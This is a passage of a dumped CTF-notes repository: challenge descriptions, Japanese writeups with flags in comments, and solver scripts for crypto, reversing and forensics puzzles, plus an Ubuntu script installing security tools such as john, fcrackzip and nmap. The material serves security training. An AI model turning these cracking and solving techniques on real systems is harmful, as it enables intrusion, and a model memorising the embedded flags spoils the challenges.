50020\n```\n\nreference: https://en.wikipedia.org/wiki/Rule_30\n\n[mis-automaton-lab.zip](https://score.wanictf.org/storage/6b8kw4a85lsyqb7h4q5tb7v2inlr410s/mis-automaton-lab.zip)\n\nWriter : Badlylucky" }, { "alpha_fraction": 0.5894941687583923, "alphanum_fraction": 0.725680947303772, "avg_line_length": 16.133333206176758, "blob_id": "cee6198d748ccbc4271c6ced8740a371effd957b", "content_id": "b89762c4bc4ce90c7cf11c1a96e078cc525aa22d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 666, "license_type": "no_license", "max_line_length": 84, "num_lines": 30, "path": "/2021/BCACTF_2.0/Digitally_Encrypted_1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\ndigファイルと以下のテキストが与えられる。\n\n```\nB6A46EE913B33E19 BCA67BD510B43632 A4B56AFE13AC1A1E BDAA7FE602E4775E EDF63AB850E67010\n```\n\ndigファイルに対して、Hint 1にあるソフトを使うと回路図が表示される。\n\n![](img/2021-06-13-00-44-04.png)\n\nどうやら、CipherはPlainとKeyとのXORらしい。\n\nつまり、CipherとKeyのXORを取ればPlainが分かる。\n\n```py\nfrom pwn import *\n\ncipher = open('encrypted.txt','r').read().split(' ')\nkey = 'd4c70f8a67d5456d'\nplain = b''\n\nfor c in cipher:\n plain += xor(bytes.fromhex(c),bytes.fromhex(key))\n\nprint(plain)\n```\n\n<!-- bcactf{that_was_pretty_simple1239152735} -->\n" }, { "alpha_fraction": 0.6592244505882263, "alphanum_fraction": 0.6850763559341431, "avg_line_length": 21.36842155456543, "blob_id": "82d3587a94900dff8dc39e9c9b5270bb77a558d2", "content_id": "831f7e93c93608359439855d0474cd445e6c6429", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1267, "license_type": "no_license", "max_line_length": 65, "num_lines": 38, "path": "/2020/pbctf_2020/Ainissesthai/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n**Enigma**で暗号化された文字列が出力されるので、これらをヒントに復号化すればよい。\n\nEnigmaの初期設定に使われる値がすべてランダムなので、まともに総当たりしても解けない。\n\nrotors: 8\\*8\\*8 通り \nreflector: 4 通り \nring_settings: 26\\*26\\*26 通り \nplugboard: ? 通り \ninitial_value: 26\\*26\\*26 通り \n\nEnigma暗号には、平文と暗号文で同じ位置に同じアルファベットが登場しないという特徴がある。\n\n* https://ja.wikipedia.org/wiki/エニグマ_(暗号機)#ある種の不完全性_(noncrashing)\n\nよって暗号文をたくさん生成し、各位置において登場しないアルファベットを絞り込んでいけばよい。\n\n```py\nfrom string import ascii_uppercase as UC\n\ncipherlist = []\nwith open('./output.txt') as f:\n while True:\n cipher = f.readline()\n if len(cipher) < 1:\n break\n cipherlist.append(cipher[0:-1]) # exclude \\n\n\nfor i in range(17):\n string = [char[i] for char in cipherlist]\n diff = set(UC)-set(string)\n print(list(diff)[0],end='')\n```\n\nフラグの文字列が出力される。形式は`pbctf{UPPERCASEPLAINTEXT}`である。\n\n<!-- pbctf{FATALFLAWINENIGMA} -->\n\n" }, { "alpha_fraction": 0.5945945978164673, "alphanum_fraction": 0.6602316498756409, "avg_line_length": 31.5, "blob_id": "d997425241b3e2b80cd78b295e11ec49101cb6bf", "content_id": "c87ab4e8faa9f00f03f4894f809fcbe00cf22c38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 259, "license_type": "no_license", "max_line_length": 63, "num_lines": 8, "path": "/2021/HeroCTF_v3/h4XOR/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import os\nfrom pwn import xor\n\npng_fixed9bytes = b'\\x89\\x50\\x4E\\x47\\x0D\\x0A\\x1A\\x0A\\x00'\ne = open(os.path.dirname(__file__)+\"/flag.png.enc\",\"rb\").read()\nkey = xor(e[0:9],png_fixed9bytes)\nf = open(os.path.dirname(__file__)+\"/flag.png\",\"wb\")\nf.write(xor(e,key))" }, { "alpha_fraction": 0.5429447889328003, "alphanum_fraction": 0.5705521702766418, "avg_line_length": 19.39583396911621, "blob_id": "ae866915f31e2050c1a226ac2f36dd3207563baa", "content_id": "261135138b1504d17d4c6df820e949cce9629cd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1120, "license_type": "no_license", "max_line_length": 59, "num_lines": 48, "path": "/2020/WaniCTF/logged_flag/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nキーボードの入力が記録されているようなので見やすくする。\n\n```py\nimport re\n\ncmd = ''\n\nwith open('./key_log.txt') as f:\n for _ in range(317):\n line = f.readline()\n key = re.findall(r'(?<=\\[).+?(?=\\])',line)\n if len(key) == 0:\n continue\n if key[0] == 'Enter':\n cmd += '\\n'\n elif key[0] == 'Shift':\n continue\n elif key[0] == 'Space':\n cmd += ' '\n elif key[0] == 'BackSpace':\n cmd = cmd[:-1]\n else:\n cmd += key[0].lower()\n \n print(cmd)\n```\n\n```bash\n$ python3 solver.py \nmkdir steghide\ncp original.jpg ./steghide\ncd steghide\necho flag[k3y-l0gg3r-1s-v3ry-d4ng3r0us] . flag.txt\nsteghide embed -cf original.jpg -ef flag.txt -sf secret.jpg\nmachikanetamachikanesai\nmachikanetamachikanesai\nsteghide extract -sf secret.jpg\nmachikanetamachikanesai\nycat flag.txt\n```\n\n`Shift`の部分を適用して`FLAG{}`の形式にする。\n\n英字配列のキーボードなので、`-`のシフト入力は`_`に読み替える。\n\n<!-- FLAG{k3y_l0gg3r_1s_v3ry_d4ng3r0us} -->" }, { "alpha_fraction": 0.708695650100708, "alphanum_fraction": 0.7347826361656189, "avg_line_length": 20, "blob_id": "9f3d6b13a620941795c8501ecd8bd1a9c82c8294", "content_id": "71015a53734b5d41299b2055a691dca992fe525c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 230, "license_type": "no_license", "max_line_length": 94, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/Hidden/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "**Description**\n\nOh no, someone hid my flag behind a giant red block! Please help me retrieve it!!\n\n**Attachments**\n\n[https://imaginaryctf.org/r/10C4-challenge.psd](https://imaginaryctf.org/r/10C4-challenge.psd)\n\n**Author**\n\nAstro" }, { "alpha_fraction": 0.5793209671974182, "alphanum_fraction": 0.595678985118866, "avg_line_length": 21.047618865966797, "blob_id": "6c304cc414078c6b5f6d96efaced1ca0bf90cdbb", "content_id": "c0c1b40333c231644527e6b2bec47e5cb93cc958", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3240, "license_type": "no_license", "max_line_length": 86, "num_lines": 147, "path": "/environment/setup.sh", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "##############################\n# For Ubuntu 20.04 #\n# Usage : sudo sh setup.sh #\n##############################\n\nsudo apt-get update -y\n\n##############################\n# Misc #\n##############################\n\n# Git\napt install git\n\n# curl\nsudo apt install curl\n\n# Python2\napt install python2\n\n# pip\ncurl https://bootstrap.pypa.io/get-pip.py -o get-pip.py\npython2 get-pip.py\n\n# Ruby\nsudo apt-get install libreadline-dev\nsudo apt install build-essential libssl-dev zlib1g-dev\ngit clone https://github.com/rbenv/rbenv.git ~/.rbenv\ngit clone https://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build\n<< BASHRC # append to .bashrc\nexport PATH=$PATH:$HOME/.rbenv/bin \nBASHRC\nrbenv install 2.7.1\n\n# docker\nsudo apt install docker-compose\n\n##############################\n# Pwn #\n##############################\n\n# pwntools\npython3 -m pip install pwntools\n\n##############################\n# Reversing #\n##############################\n\n# angr (with virtualenv)\napt-get install python3-dev libffi-dev build-essential virtualenvwrapper\n<< BASHRC # append to .bashrc\n### Virtualenvwrapper\nif [ -f /usr/share/virtualenvwrapper/virtualenvwrapper.sh ]; then\n export WORKON_HOME=$HOME/.virtualenvs\n source /usr/share/virtualenvwrapper/virtualenvwrapper.sh\nfi\nBASHRC\n# :after restart\nmkvirtualenv --python=$(which python3) angr\npip install angr\n\n# UPX\nsudo apt-get install -y upx\n\n# gdb-peda\ngit clone https://github.com/longld/peda.git ~/peda\necho \"source ~/peda/peda.py\" >> ~/.gdbinit\n\n# for 32bit ELF\napt-get install lib32z1\n\n# Ghidra (include install dependencies)\nwget https://download.java.net/java/GA/jdk11/9/GPL/openjdk-11.0.2_linux-x64_bin.tar.gz\ntar xvf openjdk-11.0.2_linux-x64_bin.tar.gz\nsudo mkdir /opt/java/\nsudo mv jdk-11.0.2 /opt/java/\necho 'JAVA_HOME=/opt/java/jdk-11.0.2' >> ~/.bashrc\necho 'PATH=$JAVA_HOME/bin:$PATH' >> ~/.bashrc\n\n# uncompyle6 (.pyc to .py)\npip install uncompyle6\n\n##############################\n# Crypto #\n##############################\n\n# Crypto\npip3 install pycrypto\npip install pycryptodome\n\n##############################\n# Math #\n##############################\n\n# SageMath\napt-get install sagemath\n\n##############################\n# Forensic #\n##############################\n\n# Volatility (include install dependencies)\nsudo apt install pcregrep libpcre++-dev\nsudo apt install gcc python2.7-dev\npip install pycrypto\npip install distorm3==3.4.4\ngit clone https://github.com/volatilityfoundation/volatility.git\ncd volatility/\nsudo python2 setup.py build install\n\n# Wireshark\nsudo apt install wireshark\n\n# binwalk\nsudo apt install binwalk\n\n# Zsteg(Ruby)\nsudo gem install zsteg\n\n# fcrackzip\nsudo apt-get install fcrackzip\n\n# john the ripper\ngit clone https://github.com/openwall/john.git\ncd john/src\n./configure && make\nsudo ln -s $(pwd)/../run/zip2john /usr/local/bin\n\n# mupdf, mutool\nsudo apt install mupdf-tools\n\n# QSSTV\nsudo apt-get install qsstv\nsudo apt install pavucontrol\n\n# ffmpeg\nsudo apt install ffmpeg\n\n##############################\n# Web #\n##############################\n\n# nmap\nsudo apt install nmap\n\n# lynx\nsudo apt install lynx" }, { "alpha_fraction": 0.6944444179534912, "alphanum_fraction": 0.71875, "avg_line_length": 18.266666412353516, "blob_id": "865d2c9cda8cdc24e3c98f6ba1230c69110f58e8", "content_id": "521b08d8b2373250a585ac1b4ecfe5b111d487d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 288, "license_type": "no_license", "max_line_length": 84, "num_lines": 15, "path": "/2021/BCACTF_2.0/Wait_this_isnt_C/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "This just looks like a binary...\n\nLets try to decompile it...\n\nWait, this isn't C...\n\n[flag_checker_1](https://objects.bcactf.com/bcactf2/wait_this_isnt_c/flag_checker_1)\n\nHint 1 of 2\n\nWhat is the original language, maybe look into that language?\n\nHint 2 of 2\n\nWhat do arrays start at? ;)" }, { "alpha_fraction": 0.7379679083824158, "alphanum_fraction": 0.7834224700927734, "avg_line_length": 61.5, "blob_id": "018237b2a67546bf0a2081f912dce2d5c61d70a7", "content_id": "5de8334eb3ac8440259c27afa326f4647d239947", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 374, "license_type": "no_license", "max_line_length": 95, "num_lines": 6, "path": "/2020/SquareCTF2020/Hash_My_Awesome_Commands/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I found this strange server that only has two commands. Looks like there's a command to get the\nflag, but I can't figure out how to get it to work. It did come with a strange note that had\n**9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=** written on it. Maybe that's important?\nnc challenges.2020.squarectf.com 9020\n\n[hmac.go](https://2020.squarectf.com/static/files/hmac.go)" }, { "alpha_fraction": 0.6088560819625854, "alphanum_fraction": 0.7749077677726746, "avg_line_length": 33, "blob_id": "082ca44b08993cecb34c622a06e04f056ec08f94", "content_id": "2dfd5a334ef20906dc686eedf047f48fe61d5bfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 271, "license_type": "no_license", "max_line_length": 102, "num_lines": 8, "path": "/2021/HeroCTF_v3/h4XOR/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Can you recover the flag.png image ?\n\nFormat : Hero{flag}\nAuthor : xanhacks\n\n[flag.png.enc](https://www.heroctf.fr/files/237772c88be084c125323d701220b77d/flag.png.enc?token=eyJ1c2VyX2lkIjoxMzgyLCJ0ZWFtX2lkIjo3NDYsImZpbGVfaWQiOjE4fQ.YIOVAw.D0oLFcGSSa8zG-8gQalS_NsFQcc)\n\n[xor.py](https://www.heroctf.fr/files/d314a837ffa10d95ffb6c67446d4360f/xor.py?token=eyJ1c2VyX2lkIjoxMzgyLCJ0ZWFtX2lkIjo3NDYsImZpbGVfaWQiOjE5fQ.YIOVAw.R2qmFfRyRAOZGlcUQg2S28eEmLo)" }, { "alpha_fraction": 0.3033088147640228, "alphanum_fraction": 0.3841911852359772, "avg_line_length": 19.961538314819336, "blob_id": "530e4f5127e14bb92daba8af9786ff9f6ad3fa61", "content_id": "c4144b12d745d2e93a8268cd79104f898949ba1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 546, "license_type": "no_license", "max_line_length": 80, "num_lines": 26, "path": "/2021/justCTF_2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# justCTF [*] 2020\n\n* https://2020.justctf.team/\n\n* 2021/01/30 15:00 JST — 2021/02/01 04:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ------------------------------------- | ------- | ----: | -----: |\n| Reversing | [That's not crypto](Thats_not_crypto) | pyc | 50 | |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------- | ------------ | ------- | ----: | -----: |\n\n---\n\n## Result\n\n* 100 points\n\n* 357 / 804 (> 1 pt)" }, { "alpha_fraction": 0.598802387714386, "alphanum_fraction": 0.7005987763404846, "avg_line_length": 17.55555534362793, "blob_id": "262a3f6b5b0a83e905ac476bf9ad27db3f0baef3", "content_id": "6c9ed495275a3362bc85c7af4f07b9195b586c51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 237, "license_type": "no_license", "max_line_length": 41, "num_lines": 9, "path": "/2021/UIUCTF_2021/wasmbaby/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://wasmbaby.chal.uiuc.tf にアクセスする。\n\n開発者ツールで`index.wasm`を見ると、フラグがそのまま書かれていた。\n\n![](img/2021-07-31-23-38-09.png)\n\n<!-- uiuctf{welcome_to_wasm_e3c3bdd1} -->\n" }, { "alpha_fraction": 0.706818163394928, "alphanum_fraction": 0.7363636493682861, "avg_line_length": 22.210525512695312, "blob_id": "ecbf1b3358defb651a85a892e454a5fb8f2771a7", "content_id": "0d083b729b7382130298d1409ac7f22c8909bfa9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 440, "license_type": "no_license", "max_line_length": 86, "num_lines": 19, "path": "/2021/BCACTF_2.0/Welcome_to_the_Casino/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Can you get three-of-a-kind on this slot machine? Let's find out!\n\n`nc misc.bcactf.com 49156`\n\nHint 1 of 4\n\nThere's got to be a faster way than to connect manually, right?\n\nHint 2 of 4\n\nCan you use a tool to make your computer connect for you?\n\nHint 3 of 4\n\nThe flag is in the format bcactf{...}. Use that to your advantage when parsing output.\n\nHint 4 of 4\n\nOnce you're connecting as fast as you can, how can you get even more connections?" }, { "alpha_fraction": 0.714893639087677, "alphanum_fraction": 0.757446825504303, "avg_line_length": 20.454545974731445, "blob_id": "64defc43f219860659ed30fde6e1c964c92fdc04", "content_id": "d9bc06744d5525d0384bbdcb1b1ab0cb1373d068", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 237, "license_type": "no_license", "max_line_length": 116, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/Chicken_Caesar_Salad/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "**Description**\n\nI remember the good old days when Caesar ciphers were easy…\n\n**Attachments**\n\n[https://imaginaryctf.org/r/5363-chicken-caesar-salad.txt](https://imaginaryctf.org/r/5363-chicken-caesar-salad.txt)\n\n**Author**\n\nFIREPONY57" }, { "alpha_fraction": 0.6740196347236633, "alphanum_fraction": 0.7230392098426819, "avg_line_length": 33, "blob_id": "83cd6c1552aba80a0fd1b2490c65a6423c8ad001", "content_id": "d451f3cbba35bb799b2154fe9639cba200714ec9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 408, "license_type": "no_license", "max_line_length": 64, "num_lines": 12, "path": "/2021/DiceCTF_2021/babymix/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "\nimport angr\n\np = angr.Project('babymix')\nmain_addr = p.loader.main_object.get_symbol('main').rebased_addr\nprint('main_addr = ',main_addr)\nstate = p.factory.entry_state()\nsim = p.factory.simulation_manager(state)\naddr_success = main_addr + (0x222C-0x21C5)\naddr_failed = main_addr + (0x2238-0x21C5)\nsim.explore(find=addr_success,avoid=addr_failed)\nif len(sim.found) > 0:\n print(sim.found[0].posix.dumps(0))" }, { "alpha_fraction": 0.6436170339584351, "alphanum_fraction": 0.813829779624939, "avg_line_length": 61.66666793823242, "blob_id": "ec2873f8932b3d8d7db0971b2ed9c7fe53d1204a", "content_id": "83f3e048217e9d2cb8ec8a3acf5c017d45fcc17a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 188, "license_type": "no_license", "max_line_length": 110, "num_lines": 3, "path": "/2021/RaRCTF_2021/Dotty/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "My new program will keep your secrets safe using military grade encryption!\n\n[Dotty.exe - 81a733](https://files-ctf.rars.win/challenge-files/16/81a73332991e141a45c77a115a7c0415/Dotty.exe)\n" }, { "alpha_fraction": 0.7572254538536072, "alphanum_fraction": 0.7745664715766907, "avg_line_length": 57, "blob_id": "0140050775e08da170381e2d291cb976c826c02d", "content_id": "b4b232081470e22a4e27fc2f3522cd98c65b8eba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 173, "license_type": "no_license", "max_line_length": 95, "num_lines": 3, "path": "/2020/KipodAfterFreeCTF/8byte/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "My friend has sent me this packed binary. Can you understand what it does and extract the flag?\n\n[binary.exe](https://kaf-public.s3-eu-west-1.amazonaws.com/8byte/binary.exe)" }, { "alpha_fraction": 0.5320000052452087, "alphanum_fraction": 0.5580000281333923, "avg_line_length": 18.230770111083984, "blob_id": "94beaadd55cd3c0aa028adf6fb3c47bbb464dbca", "content_id": "1ba66d09986cdf7cb0b984905860e184254b4dd6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 500, "license_type": "no_license", "max_line_length": 43, "num_lines": 26, "path": "/2021/SECCON_Beginners_CTF_2021/p-8RSA/problem.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import *\nfrom random import getrandbits\nfrom os import urandom\nfrom flag import flag\n\n\ndef gen_primes(bits, e):\n q = getStrongPrime(bits)\n p = q\n while True:\n p = p-8 # p-8\n phi = (p - 1) * (q - 1)\n if isPrime(p) and GCD(phi, e) != 1:\n break\n return p, q\n\nflag = flag.encode(\"utf-8\") + urandom(64)\nflag = bytes_to_long(flag)\n\ne = 17\np, q = gen_primes(512, e)\nn = p * q\n\nprint(\"n =\", n)\nprint(\"e =\", e)\nprint(\"c =\", pow(flag, e, n))\n" }, { "alpha_fraction": 0.5386710166931152, "alphanum_fraction": 0.5876906514167786, "avg_line_length": 19.64044952392578, "blob_id": "5ebab58e0a4e7356d6487eaf065e32e3d4c7a75d", "content_id": "eec4271ba271b36c388f9b2c71b4a8f5dcbb0a54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2052, "license_type": "no_license", "max_line_length": 68, "num_lines": 89, "path": "/2021/UIUCTF_2021/dhke_intro/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n\n```py\nimport random\nfrom Crypto.Cipher import AES\n\n# generate key\ngpList = [ [13, 19], [7, 17], [3, 31], [13, 19], [17, 23], [2, 29] ]\ng, p = random.choice(gpList)\na = random.randint(1, p)\nb = random.randint(1, p)\nk = pow(g, a * b, p)\nk = str(k)\n\n# print(\"Diffie-Hellman key exchange outputs\")\n# print(\"Public key: \", g, p)\n# print(\"Jotaro sends: \", aNum)\n# print(\"Dio sends: \", bNum)\n# print()\n\n# pad key to 16 bytes (128bit)\nkey = \"\"\ni = 0\npadding = \"uiuctf2021uiuctf2021\"\nwhile (16 - len(key) != len(k)):\n key = key + padding[i]\n i += 1\nkey = key + k\nkey = bytes(key, encoding='ascii')\n\nwith open('flag.txt', 'rb') as f:\n flag = f.read()\n\niv = bytes(\"kono DIO daaaaaa\", encoding = 'ascii')\ncipher = AES.new(key, AES.MODE_CFB, iv)\nciphertext = cipher.encrypt(flag)\n\nprint(ciphertext.hex())\n```\n\n`iv`は固定で、`key`がランダムである。\n\nしかし、`key`の生成に使われている`k`の値を見てみると、\n\n```py\ngpList = [ [13, 19], [7, 17], [3, 31], [13, 19], [17, 23], [2, 29] ]\ng, p = random.choice(gpList)\na = random.randint(1, p)\nb = random.randint(1, p)\nk = pow(g, a * b, p)\nk = str(k)\n```\n\n`mod p`の値が使われているので、`0~30`の値をとることが分かる。\n\n31パターンなら総当たりで良いので、以下を実行してフラグが得られた。\n\n```py\nfrom Crypto.Cipher import AES\n\nfor k in range(31):\n k = str(k)\n\n # pad key to 16 bytes (128bit)\n key = \"\"\n i = 0\n padding = \"uiuctf2021uiuctf2021\"\n while (16 - len(key) != len(k)):\n key = key + padding[i]\n i += 1\n key = key + k\n key = bytes(key, encoding='ascii')\n\n with open('output.txt', 'rb') as f:\n out = bytes.fromhex(f.read().decode())\n\n iv = bytes(\"kono DIO daaaaaa\", encoding = 'ascii')\n cipher = AES.new(key, AES.MODE_CFB, iv)\n ciphertext = cipher.decrypt(out)\n\n if b'uiuctf' in ciphertext:\n print(f'{key = }')\n print(f'{ciphertext = }')\n```\n\n<!-- uiuctf{omae_ha_mou_shindeiru_b9e5f9} -->" }, { "alpha_fraction": 0.37995824217796326, "alphanum_fraction": 0.8580375909805298, "avg_line_length": 42.54545593261719, "blob_id": "a7686da4668b93f7369216651e7786963e3a51ff", "content_id": "1333a14577bcdb3c600d6b2129e9dbd309c6bb84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 479, "license_type": "no_license", "max_line_length": 223, "num_lines": 11, "path": "/2021/BCACTF_2.0/Sailing_Thru_Decryption/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import *\nfrom pwn import *\n\nc = b'011001110110101001110011011011010111011101110011011110110011000101111000010111110110111100110001011010110101111101111000001101000111000001110010010111110110110000110011011110010011010001101010011011100011111101111101'\nkey = b'FHSKDN'\n\nprint(long_to_bytes(int(c,2)))\n\n# Vigenere Decode with key FHSKDN\n# \n# https://gchq.github.io/CyberChef/#recipe=Vigen%C3%A8re_Decode('FHSKDN')&input=Z2pzbXdzezF4X28xa194NHByX2wzeTRqbj99\n" }, { "alpha_fraction": 0.7797902822494507, "alphanum_fraction": 0.7826501727104187, "avg_line_length": 115.66666412353516, "blob_id": "32b584e7be8b5b119ae510c7ceb0bca5a17ab92b", "content_id": "73ebb8a650ee91fef806954c0eae264b181442ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1067, "license_type": "no_license", "max_line_length": 757, "num_lines": 9, "path": "/2021/RITSEC_CTF_2021/Inception_CTF_Dream_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "The purpose of this CTF challenge is to identify common methods of hiding malicious files and code. In most cases adversaries will attempt to evade defenses in many cases by masquerading, hiding files, and more. There are five directories like the five levels in the movie Inception, Reality -> Van Chase -> The Hotel -> Snow Fortress -> Limbo. You will find one flag in each of the levels, that flag will also be the password to extract the next directory. Requirements: • You must have 7zip installed • Drop the InceptionCTF.7z on the Desktop as “InceptionCTF” • Use the option “Extract to \"<name of directory>\\” for the CTF to function properly Missing either of the above may result in complications which may cause issues when attempting to find flags.\n\nNOTE: These challenges have a flag format of RITSEC{}\n\nDream 1: We have to get to their subconscious first, look for a hidden text file within the directory “Reality” this flag will unlock the next directory.\n\n```\nWe would like to thank our sponsor @SRA for contributing this challenge!\n```" }, { "alpha_fraction": 0.7798165082931519, "alphanum_fraction": 0.8027523159980774, "avg_line_length": 18.81818199157715, "blob_id": "18970fdb8fb2bd671c6ef20aaa615477c29f1d68", "content_id": "b6e385c90033129aaed0f7fcc8ae7498a43c2e68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 304, "license_type": "no_license", "max_line_length": 111, "num_lines": 11, "path": "/2021/WaniCTF21-spring/watch_animal/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "スーパーかわいい動物が見れるWebサービスを作ったよ。\n\[email protected]\n\nのメアドの人のパスワードがフラグです。\n\nhttps://watch.web.wanictf.org/\n\n[web-watch-animal.zip](https://score.wanictf.org/storage/vgytucbfsin9ocpx5vmla2mmaokd09nt/web-watch-animal.zip)\n\nWriter : okmt\n" }, { "alpha_fraction": 0.713004469871521, "alphanum_fraction": 0.7533632516860962, "avg_line_length": 19.363636016845703, "blob_id": "ec4db0a62f9ebcb480a982cbb57b60ecb269d109", "content_id": "45c77f232d6b5c6846baa87b0ef76e15f463c664", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 223, "license_type": "no_license", "max_line_length": 79, "num_lines": 11, "path": "/2021/BCACTF_2.0/I_Can_Haz_Interwebz/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Awww! Look at these cute and adorable cats helping me navigate the interwebzes.\n\n`nc misc.bcactf.com 49155`\n\nHint 1 of 2\n\nIf you don't have it, install netcat.\n\nHint 2 of 2\n\nYou'll need to run the command from the terminal." }, { "alpha_fraction": 0.6081730723381042, "alphanum_fraction": 0.8317307829856873, "avg_line_length": 45.22222137451172, "blob_id": "c9544526c656e0030c6071166e61156b9ae63a78", "content_id": "e299930082005a36e4efff56c0043ad4adad8a5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 416, "license_type": "no_license", "max_line_length": 165, "num_lines": 9, "path": "/2021/redpwnCTF_2021/beginner-generic-pwn-number-0/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "rob keeps making me write beginner pwn! i'll show him...\n\n`nc mc.ax 31199`\n\nDownloads\n\n[beginner-generic-pwn-number-0](https://static.redpwn.net/uploads/1e27cfadfb40b4f3faa522e57565371c52ef70e46830aab2c8d6c35f3808b319/beginner-generic-pwn-number-0)\n\n[beginner-generic-pwn-number-0.c](https://static.redpwn.net/uploads/ce82796645cd48396ac95cd649e83faaf121589d578096a141c56ee444347a54/beginner-generic-pwn-number-0.c)\n" }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.7916666865348816, "avg_line_length": 35, "blob_id": "b71e774df28406284c9307ca051e8ec5d314a6e7", "content_id": "296e6ef4e28b8f2309ac716808159ab8ab8a9812", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 306, "license_type": "no_license", "max_line_length": 156, "num_lines": 8, "path": "/2020/Harekaze_mini_CTF_2020/What_time_is_it_now/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# What time is it now?\n\nそうねだいたいね…\n\nhttp://harekaze2020.317de643c0ae425482fd.japaneast.aksapp.io/what-time-is-it-now/\n\nAttachments: [what-time-is-it-now.zip](https://static.harekaze.com/web/what-time-is-it-now/9f8166f7d1a170ce19e98278035b1329b73647ab/what-time-is-it-now.zip)\nAuthor: st98\n" }, { "alpha_fraction": 0.504273533821106, "alphanum_fraction": 0.5441595315933228, "avg_line_length": 16.600000381469727, "blob_id": "1b31dbba2a4d25adb615e8cd56a63938ff4bbec3", "content_id": "ec4a40100074b17c12ae08f3548170997b8c942a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 351, "license_type": "no_license", "max_line_length": 41, "num_lines": 20, "path": "/2020/WaniCTF/Find_a_Number/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\nconn = remote('number.wanictf.org',60000)\nn_min, n_max = 0, 500000\n\nwhile True:\n\n conn.recvuntil('input:')\n mid = (n_min + n_max) // 2\n conn.sendline(str(mid))\n\n msg = str(conn.recvlines(2))\n\n if 'small' in msg:\n n_min = mid\n elif 'big' in msg:\n n_max = mid\n else:\n print(msg)\n break" }, { "alpha_fraction": 0.7771381735801697, "alphanum_fraction": 0.7976973652839661, "avg_line_length": 92.61538696289062, "blob_id": "2a3057c3b600391eaa9fd8d6d1664d2cf381089c", "content_id": "4af22e9e18f149c95548d377e0383325ef0565a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1230, "license_type": "no_license", "max_line_length": 671, "num_lines": 13, "path": "/2021/RITSEC_CTF_2021/PleaseClickAlltheThings_1_BegineersRITSEC_html/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Note: this challenge is the start of a series of challenges. The purpose of this 